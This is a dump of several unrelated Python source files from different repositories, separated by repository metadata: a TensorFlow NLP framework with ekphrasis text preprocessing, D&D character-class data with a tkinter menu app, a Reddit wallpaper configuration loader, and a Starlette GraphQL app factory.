assert len(required_placeholders_set) == len(exist_placeholders_1), "all required placeholders should exist"
assert len(required_placeholders_set) == len(
required_placeholders_set & exist_placeholders_1), "all required placeholders should exist"
# losses in training steps should exist in self.placeholder_requirement_for_losses:
losses_in_training_steps = set()
for batch_training_steps in self.training_steps:
for one_step_losses in batch_training_steps:
for loss_name in one_step_losses:
losses_in_training_steps.add(loss_name)
losses_in_placeholder_requirement = set()
for loss_name in self.placeholder_requirement_for_losses.keys():
losses_in_placeholder_requirement.add(loss_name)
for loss_name in losses_in_training_steps:
assert loss_name in losses_in_placeholder_requirement, \
"losses \"%s\" in training steps should exist in self.placeholder_requirement_for_losses" % (loss_name)
# different eval step can not have same losses, one eval step can not have same losses:
tmp = set()
for losses_in_one_eval_step in self.eval_steps:
for loss_name in losses_in_one_eval_step:
assert loss_name not in tmp, "different eval step can not have same losses, one eval step can not have same losses"
tmp.add(loss_name)
def check_after_build_graph(self):
# losses and losses_to_only_watch can not have overlap:
losses_to_optimize = self.get_items_group_by_name_from_by_id(self.losses_groups)
losses_to_watch = self.get_items_group_by_name_from_by_id(self.losses_only_watch_groups)
LOS = set([name for name in losses_to_optimize.keys()])
LWS = set([name for name in losses_to_watch.keys()])
LAS = LOS | LWS # Union
assert len(LAS) == len(LOS) + len(LWS)
@abstractmethod
def build_inferring_graph(self, group_id: int) -> NoReturn:
pass
@abstractmethod
def build_training_graph(self, group_id: int) -> NoReturn:
pass
@abstractmethod
def process_origin_data_for_placeholders(self, data: Dict[str, List[Any]], for_loss_n: str = None) -> Dict[
str, List[Any]]:
"""
:param data:
:param for_loss_n:
:return:
"""
pass
@abstractmethod
def vars_mapping_for_loading_transfer_param(self, vars_to_store: List[tf.Variable]) -> Dict[str, str]:
pass
@abstractmethod
def merge_batch_prediction_result(self, new_batch_result: Dict[str, Any],
previous_result: Union[Dict[str, Any], None]):
pass
@abstractmethod
def set_vocab_size(self, vocab_size: int) -> NoReturn:
pass
@abstractmethod
def new_losses_are_better(self, new_losses: Dict[str, float], old_losses: Dict[str, float]) -> bool:
pass
def feed_dict_post_process(self, feed_dict: Dict, data_name_not_exist: Set[str]) -> Dict:
return feed_dict
def create_placeholders(self, group_id: int) -> NoReturn:
"""an example of meta_dict: {'input':[dtype, shape, name]}"""
one_group_placeholders = {}
for key in self.placeholders_meta_data.keys():
x = self.placeholders_meta_data[key]
one_group_placeholders[key] = tf.placeholder(dtype=x.dtype, shape=x.shape, name=key + "_%d" % group_id)
self.placeholder_groups[group_id] = one_group_placeholders
def get_items_group_by_name_from_by_id(self, items_group_by_parallel_id: Dict[int, Dict[str, Any]]) -> Dict[
str, List]:
"""
Only for transfer Dict[int, Dict[str, Any]] into Dict[str, List[Any]]
:param items_group_by_parallel_id:
:return:
"""
losses_dict = {}
for id in items_group_by_parallel_id.keys():
one_group = items_group_by_parallel_id[id]
for name in one_group.keys():
if name in losses_dict:
losses_dict[name].append(one_group[name])
else:
losses_dict[name] = one_group[name]
return losses_dict
def get_all_configs_in_json(self):
# todo:how to convert a complex object to json?
config_json = {}
for key in self.config.keys():
if type(self.config[key]) == PlaceholderMetaData:
config_json[key] = self.config[key].__dict__
else:
config_json[key] = self.config[key]
print(config_json)
return json.dumps(config_json, sort_keys=True, indent=4)
```
#### File: my-tf-framework-for-nlp-tasks/TextPreprocessing/ekphrasis_for_preprocess.py
```python
from ekphrasis.classes.preprocessor import TextPreProcessor
from ekphrasis.classes.tokenizer import SocialTokenizer
from ekphrasis.dicts.emoticons import emoticons
from TextPreprocessing.TextPreprocessor import TextPreprocessor
class EkphrasisTextPreprocess(TextPreprocessor):
def __init__(self):
super(EkphrasisTextPreprocess, self).__init__(name='ekphrasis')
self.tool = get_text_processor()
def pre_process_doc(self, doc: str):
return self.tool.pre_process_doc(doc)
def get_text_processor()->TextPreProcessor:
text_processor = TextPreProcessor(
# terms that will be normalized
normalize=['url', 'email', 'percent', 'money', 'phone', 'user',
'time', 'url', 'date', 'number'],
# terms that will be annotated
annotate={"hashtag", "allcaps", "elongated", "repeated",
'emphasis', 'censored'},
fix_html=True, # fix HTML tokens
# corpus from which the word statistics are going to be used
# for word segmentation
segmenter="twitter",
# corpus from which the word statistics are going to be used
# for spell correction
corrector="twitter",
unpack_hashtags=True, # perform word segmentation on hashtags
unpack_contractions=True, # Unpack contractions (can't -> can not)
spell_correct_elong=False, # spell correction for elongated words
# select a tokenizer. You can use SocialTokenizer, or pass your own
# the tokenizer, should take as input a string and return a list of tokens
tokenizer=SocialTokenizer(lowercase=True).tokenize,
# list of dictionaries, for replacing tokens extracted from the text,
# with other expressions. You can pass more than one dictionaries.
dicts=[emoticons]
)
return text_processor
def test():
text_processor=get_text_processor()
sentences = [
"CANT WAIT for the new season of #TwinPeaks \(^o^)/!!! #davidlynch #tvseries :)))",
"I saw the new #johndoe movie and it suuuuucks!!! WAISTED $10... #badmovies :/",
"@SentimentSymp: can't wait for the Nov 9 #Sentiment talks! YAAAAAAY !!! :-D http://sentimentsymposium.com/."
]
for s in sentences:
print(" ".join(text_processor.pre_process_doc(s)))
```
#### File: my-tf-framework-for-nlp-tasks/TextPreprocessing/TextIndexTranslator.py
```python
from abc import ABCMeta, abstractmethod
from typing import List, Dict, Any, Collection, Callable
class TextIndexTranslator:
def __init__(self, name: str, eos_id: int):
self.name = name
self.eos_id = eos_id
@abstractmethod
def encode(self, text) -> List[int]:
pass
@abstractmethod
def decode(self, tokens: List[int]) -> str:
pass
@abstractmethod
def get_vocab_size(self) -> int:
pass
```
#### File: my-tf-framework-for-nlp-tasks/UserDefined/file_format_adapter.py
```python
from TextPreprocessing.file_api import read_file_lines,write_file_lines
base_path = '../data/my_s2s_test_data/'
input='informal.txt'
target='formal.txt'
def combine(inf_path,fm_path,out_path):
inf=read_file_lines(inf_path)
fm=read_file_lines(fm_path)
r=['input\ttarget']
for i,f in zip(inf,fm):
r.append(i+'\t'+f)
write_file_lines(out_path,lines=r)
combine(base_path+'train/informal',base_path+'train/formal',base_path+'train.tsv')
combine(base_path+'tune/informal',base_path+'tune/formal.ref0',base_path+'dev.tsv')
``` |
{
"source": "JimTheBirdman/DnD-Machine",
"score": 3
} |
#### File: JimTheBirdman/DnD-Machine/Classes.py
```python
import armor
class Class():
def __init__(self, name, hit_dice, armor_prof, weapon_prof, tools, saving_throws, skills, equipment, features, cantrips, spells_known, spell_slots):
self.name = name #String
self.hit_dice = hit_dice #Int
self.armor_prof = armor_prof #Array of strings
self.weapon_prof = weapon_prof #Array of strings
self.tools = tools #Array of strings, because of Bard
self.saving_throws = saving_throws #Array of strings
self.skills = skills #2D Array, first value is how many choices
self.equipment = equipment #Array of strings
self.features = features #Array of strings
self.cantrips = cantrips #Int
self.spells_known = spells_known #Int, or string if needs to be calced
self.spell_slots = spell_slots #Int, spell slots at level 1
self.prof_bonus = 2 #Int, hard coded for level 1
Barbarian = Class(
"Barbarian",
12,
["Light Armor", "Medium Armor", "Shields"],
["Simple", "Martial"],
None,
["Strength", "Constitution"],
[2, ["Animal Handling", "Athletics", "Intimidation", "Nature", "Perception", "Survival"]],
[
["Greataxe", "Any Martial"],
["2 Handaxes", "Any Simple"],
[["Explorer's Pack", "4 Javelins"]]
],
["Rage", "Unarmored Defense"],
None,
None,
None
)
Bard = Class(
"Bard",
12,
["Light Armor"],
["Simple", "Hand Crossbow", "Longsword", "Rapier", "Shortsword"],
"Three musical instruments",
["Dexterity", "Charisma"],
[2, ["Athletics", "Acrobatics", "Sleight of Hand", "Stealth", "Arcana",
"History", "Investigation", "Nature", "Religion", "Animal Handling",
"Insight", "Medicine", "Perception", "Survival", "Deception",
"Intimidation", "Performance", "Persuasion"]],
[
["Rapier", "Longsword", "Any Simple"],
["Diplomat's Pack", "Entertainer's Pack"],
["Lute", "Any instrument"],
["Leather"],
["Dagger"]
],
["Spellcasting", "Bardic Inspiration(d6)"],
2,
4,
2
)
Cleric = Class(
"Cleric",
8,
["Light Armor", "Medium Armor", "Shields"],
["Simple"],
None,
["Wisdom", "Charisma"],
[2, ["History", "Insight", "Medicine", "Persuasion", "Religion"]],
[
["Mace"],
["Scale Mail", "Leather"],
["Light Crossbow and 20 Bolts", "Any Simple"],
["Priest's Pack", "Explorer's Pack"],
["Shield"],
["Holy Symbol"]
],
["Spellcasting", "Divine Domain"],
3,
"Wisdom mod + cleric level",
2
)
Druid = Class(
"Druid",
8,
["Light Armor", "Medium Armor", "Shields"], #Cannot be made of metal
["Club", "Dagger", "Dart", "Javelin", "Mace", "Quarterstaff", "Scimitar", "Sling", "Spear"],
"Herbalism Kit",
["Intelligence", "Wisdom"],
[2, ["Arcana", "Animal Handling", "Insight", "Medicine", "Nature", "Perception", "Religion", "Survival"]],
[
["Shield", "Any Simple"],
["Scimitar", "Any Simple Melee"],
["Leather"],
["Explorer's Pack"],
["Druidic Focus"]
],
["Druidic", "Spellcasting"],
2,
"Wisdom mod + druid level",
2
)
Fighter = Class(
"Fighter",
10,
["Light Armor", "Medium Armor", "Heavy Armor", "Shields"],
["Simple", "Martial"],
None,
["Strength", "Constitution"],
[2, ["Acrobatics", "Animal Handling", "Athletics", "History", "Insight",
"Intimidation", "Perception", "Survival"]],
[
["Chain Mail", ["Leather", "Longbow", "20 Arrows"]],
[["Any Martial", "Shield"], "Any 2 Martial"],
[["Light Crossbow", "20 Bolts"], "2 Handaxes"],
["Dungeoneer's Pack", "Explorer's Pack"]
],
["Fighting Style", "Second Wind"],
None,
None,
None
)
Monk = Class(
"Monk",
8,
None,
["Simple", "Shortsword"],
["One Artisan's Tools", "One instrument"],
["Strength", "Dexterity"],
[2, ["Acrobatics", "Athletics", "History", "Insight", "Religion", "Stealth"]],
[
["Shortsword", "Any Simple"],
["Dungeoneer's Pack", "Explorer's Pack"],
["10 Darts"]
],
["Unarmored Defense", "Martial Arts(1d4)"],
None,
None,
None
)
Paladin = Class(
"Paladin",
10,
["Light Armor", "Medium Armor", "Heavy Armor", "Shields"],
["Simple", "Martial"],
None,
["Wisdom", "Charisma"],
[2, ["Athletics", "Insight", "Intimidation", "Medicine", "Persuasion", "Religion"]],
[
[["Any Martial", "Shield"], "Any 2 Martial"],
["5 Javelins", "Any Simple Melee"],
["Priest's Pack", "Explorer's Pack"],
[["Chain Mail", "Holy Symbol"]]
],
["Divine Sense", "Lay on Hands"],
None,
None,
None
)
Ranger = Class(
"Ranger",
10,
["Light Armor", "Medium Armor", "Shields"],
["Simple", "Martial"],
None,
["Strength", "Dexterity"],
[3, ["Animal Handling", "Athletics", "Insight", "Investigation", "Nature", "Perception", "Stealth", "Survival"]],
[
["Scale Mail", "Leather"],
["2 Shortswords", "Any 2 Simple Melee"],
["Dungeoneer's Pack", "Explorer's Pack"],
[["Longbow", "20 Arrows"]]
],
["Favored Enemy", "Natural Explorer"],
None,
None,
None
)
Rogue = Class(
"Rogue",
8,
["Light Armor"],
["Simple", "Hand Crossbow", "Longswords", "Rapier", "Shortsword"],
"Thieve's Tools",
["Dexterity", "Intelligence"],
[4, ["Acrobatics", "Athletics", "Deception", "Insight", "Intimidation", "Investigation", "Perception", "Performance", "Persuasion", "Sleight of Hand", "Stealth"]],
[
["Rapier", "Shortsword"],
[["Shortbow", "20 Arrows"], "Shortsword"],
["Burglar's Pack", "Dungeoneer's Pack", "Explorer's Pack"],
[["Leather", "2 Daggers", "Thieve's Tools"]]
],
["Expertise", "Sneak Attack(1d6)", "Thieves' Cant"],
None,
None,
None
)
Sorceror = Class(
"Sorceror",
6,
None,
["Dagger", "Dart", "Sling", "Quarterstaff", "Light Crossbow"],
None,
["Constitution", "Charisma"],
[2, ["Arcana", "Deception", "Insight", "Intimidation", "Persuasion", "Religion"]],
[
[["Light Crossbow", "20 Bolts"], "Any Simple"],
["Component Pouch", "Arcane Focus"],
["Dungeoneer's Pack", "Explorer's Pack"],
["2 Daggers"]
],
["Spellcasting", "Sorcerous Origin"],
4,
2,
2
)
Warlock = Class(
"Warlock",
8,
["Light Armor"],
["Simple"],
None,
["Wisdom", "Charisma"],
[2, ["Arcana", "Deception", "History", "Intimidation", "Investigation", "Nature", "Religion"]],
[
[["Light Crossbow", "20 Bolts"], "Any Simple"],
["Component Pouch", "Arcane Focus"],
["Scholar's Pack", "Dungeoneer's Pack"],
[["Leather", "Any Simple", "2 Daggers"]]
],
["Otherworldly Patron", "Pact Magic"],
2,
2,
1
)
Wizard = Class(
"Wizard",
6,
None,
["Dagger", "Dart", "Sling", "Quarterstaff", "Light Crossbow"],
None,
["Intelligence", "Wisdom"],
[2, ["Arcana", "History", "Insight", "Investigation", "Medicine", "Religion"]],
[
["Quarterstaff", "Dagger"],
["Component Pouch", "Arcane Focus"],
["Scholar's Pack", "Explorer's Pack"],
["Spellbook"]
],
["Spellcasting", "Arcane Recovery"],
3,
"Intelligence mod + Wizard level",
2
)
CLASSES = [
Barbarian,
Bard,
Cleric,
Druid,
Fighter,
Monk,
Paladin,
Ranger,
Rogue,
Sorceror,
Warlock,
Wizard
]
```
#### File: JimTheBirdman/DnD-Machine/D&D Machine.py
```python
from tkinter import *
from tkinter.filedialog import askopenfilename
# Assign functions to menu items
def OpenChar():
#name = askopenfilename()
path = filedialog.askopenfilename(initialdir="/", title="Select File",
filetypes=(("txt files", "*.txt"),("all files", "*.*")))
def About():
print("This is a simple example of a menu")
def DiceBot():
import DiceBot2
print("Clickety Clack!")
def NameRandom():
print("First Name", "Last Name")
def blanksheet():
import blank_sheet
def rando_char():
import rando
# Create tkinter box
root = Tk()
root.title("D&D Machine")
root.geometry("600x500")
root.configure(bg='grey')
# Create menu with options
menu = Menu(root)
root.config(menu=menu)
filemenu = Menu(menu)
menu.add_cascade(label="File", menu=filemenu)
submenu = Menu(filemenu)
submenu.add_command(label="Random Character", command=rando_char)
submenu.add_command(label="Blank Character Sheet", command=blanksheet)
filemenu.add_cascade(label="New Character", menu=submenu, underline=0)
filemenu.add_command(label="Open Existing Character", command=OpenChar)
#filemenu.add_command(label="Save", command=SaveChar)
#filemenu.add_command(label="Delete", command=DeleteChar)
#filemenu.add_command(label="Print", command=PrintChar)
filemenu.add_separator()
filemenu.add_command(label="Exit", command=root.destroy)
toolmenu = Menu(menu)
menu.add_cascade(label="Tools", menu=toolmenu)
toolmenu.add_command(label="DiceBot", command=DiceBot)
toolmenu.add_command(label="NPC Name Generator", command=NameRandom)
helpmenu = Menu(menu)
menu.add_cascade(label="Help", menu=helpmenu)
helpmenu.add_command(label="About...", command=About)
mainloop()
``` |
{
"source": "JimTheCactus/RedditWallpaperWatcher",
"score": 3
} |
#### File: JimTheCactus/RedditWallpaperWatcher/config_objects.py
```python
from typing import List, Dict, Optional
from dataclasses import dataclass, field
import jsons
import yaml
@dataclass
class SubredditConfig():
""" Holds any per-subreddit configuration. That's nothing right now. """
@dataclass
class MultiredditConfig():
""" Holds information necessary to access a multireddit """
user: str
multi: str
@dataclass
class SourcesConfig():
""" Holds information about image sources """
subreddits: Optional[Dict[str, Optional[SubredditConfig]]]
multis: Optional[Dict[str, MultiredditConfig]]
@dataclass
class Size():
""" Holds a size """
width: int
height: int
aspect_ratio: float = field(init=False, repr=False)
def __post_init__(self):
self.aspect_ratio = float(self.width) / float(self.height)
@dataclass
class TargetConfig():
""" Holds information about a save target """
path: str
size: Size
sources: List[str]
allow_nsfw: bool = True
@dataclass
class WallpaperConfig():
""" Loads and holds the configuration for wallpaperwatcher. """
aspect_ratio_tolerance: float
max_downloads: int
update_interval: int
sources: SourcesConfig
targets: Dict[str, TargetConfig]
@staticmethod
def from_file(filename: str) -> "WallpaperConfig":
""" Creates a WallpaperConfig from a YAML file """
with open(filename, "r") as input_file:
return jsons.load(yaml.load(input_file, Loader=yaml.SafeLoader), WallpaperConfig)
@dataclass
class RedditAuthInfo():
""" Holds Reddit Authentication Values """
client_id: str
client_secret: str
@staticmethod
def from_file(filename: str) -> "RedditAuthInfo":
""" Creates a RedditAuthInfo from a YAML file """
with open(filename, "r") as input_file:
auth = jsons.load(yaml.load(input_file, Loader=yaml.SafeLoader), RedditAuthInfo)
return auth
``` |
{
"source": "jimtheplant/bioplatform",
"score": 3
} |
#### File: bioplatform/bioplatform/app.py
```python
from graphene import Schema
from starlette.applications import Starlette
from starlette.graphql import GraphQLApp
from .types import BioPlatformInitializer
from .util import AppStatus
DEFAULT_QUERY_TYPES = [
AppStatus
]
def __initialize_modules(initializer: BioPlatformInitializer, query_types):
query_types.append(initializer.init())
def __create_starlette_app(base_schema: Schema):
app = Starlette()
gql_app = GraphQLApp(schema=base_schema)
app.add_route('/', gql_app)
return app
def app_factory(initializer: BioPlatformInitializer, extra_types=None):
"""
This function acts as the main app factory. Creates the BaseQuery object with the queries from other BioPlatform
modules. By default, the app will have an AppStatus query.
:param initializer: A BioPlatformInitializer from a modules
:param extra_types: Any types that are not present in a module's base query, but could be used by other modules
:return: A Starlette app object with a GQL endpoint at '/'
"""
query_types = []
query_types.extend(DEFAULT_QUERY_TYPES)
__initialize_modules(initializer, query_types)
base_query = type("BaseQuery", tuple(query_types), {})
base_schema = Schema(query=base_query, types=extra_types)
return __create_starlette_app(base_schema)
``` |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.